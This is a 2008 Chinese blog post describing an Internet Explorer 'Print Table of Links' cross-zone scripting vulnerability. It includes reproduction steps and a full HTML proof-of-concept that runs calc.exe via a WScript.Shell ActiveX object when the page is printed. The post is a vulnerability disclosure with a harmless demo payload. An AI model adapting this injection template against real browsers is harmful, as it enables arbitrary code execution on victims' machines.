Holmesian Blog
  • 首页
  • 微博
  • 留言板
  • 最新Vista下的IE 0Day漏洞

    post by Holmesian / 2008-5-20 2:56 Tuesday
    Vista下的0Day漏洞
    ASLR+DEP+UAC+PatchGuard+IE7(+IE8保护模式)+安全的1b的 Office2007+...

    超级安全的架构  终于露出一点问题了。。。。


    MS Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability
    具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

    如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)

    重现:
    1.下面这个地方打上勾
    点击在新窗口中浏览此图片


    2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。

    [quote]<html>
    <body >
    Print me with table of links to execute calc.exe
    <a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
    <script>window.print();</script>
    </body>
    </html>[/quote]
    标签: ie 溢出 漏洞 0day uac vista

    你可能还感兴趣:

    Windows漏洞利用工具--MS08067

    低版本浏览器钓鱼

    可怜的Discuz,幸运的PHPwind?!------一场闹剧

    最新MySQL 0day利用代码

    BoBlog任意变量覆盖漏洞

    本地提权利器

    « 不需要技术的刷Q币、QQ秀方法 | 刷机包的选择»
    取消回复

    发表评论:

rss add mail
  • 日历

  • 搜索

  • 最新吐槽

    • WAWA
      学习了。。。
    • fire
      楼主:能不能发给我一份,我下...
    • xrffyf
      顶啊
    • juck
      解决了  有效~
    • Emily
      强大!
    • Holmesian
      @youstar:已经换好了~
    • youstar
      帮忙把友情链接更换一下,谢谢...
    • haizhen2020
      非常感谢!支持楼主!顶!!!...
    • 日新小胖
      @Holmesian:额,懂了。    我去关注...
    • Holmesian
      @KEEPER:关于南昌星空极速Netkeepe...
  • 分类

    • 生活随笔(169) 订阅本分类
    • 日积月累(103) 订阅本分类
    • 资源共享(56) 订阅本分类
    • 工作相关(11) 订阅本分类
    • FreeBSD(45) 订阅本分类
    • Ubuntu(46) 订阅本分类
    • Nginx(9) 订阅本分类
    • Apache(2) 订阅本分类
    • Python(8) 订阅本分类
    • PHP(9) 订阅本分类
    • Phone(44) 订阅本分类
  • 链接

    • LIGHT Weblog
    • youstar
    • 久酷博客
    • Creative Power
    • 排头兵 @ Talk follow
    • hemon
    • 锦记
    • My Happy Garden
    • 野兔窝
    • YY_Crazy
    • Cyrec’s Blog
  • 随便看看

    • 漏洞发生日
    • EeePC 1000HE正在来的路上……
    • 仙剑奇侠传四_回梦游仙
    • 解决SP3补丁安装问题
    • 让ubuntu完美播放RMVB
    • 淘宝太令我失望了!
    • Ubuntu网络探嗅软件
    • 小米手机预定排队
    • 今年站长不做站,要做就做垃圾站!
    • PHP 性能优化技巧
  • AD

Holmesian Blog | Powered byemlog | 赣ICP备10006010号 sitemap

© 1998 - 2011 All Rights Reserved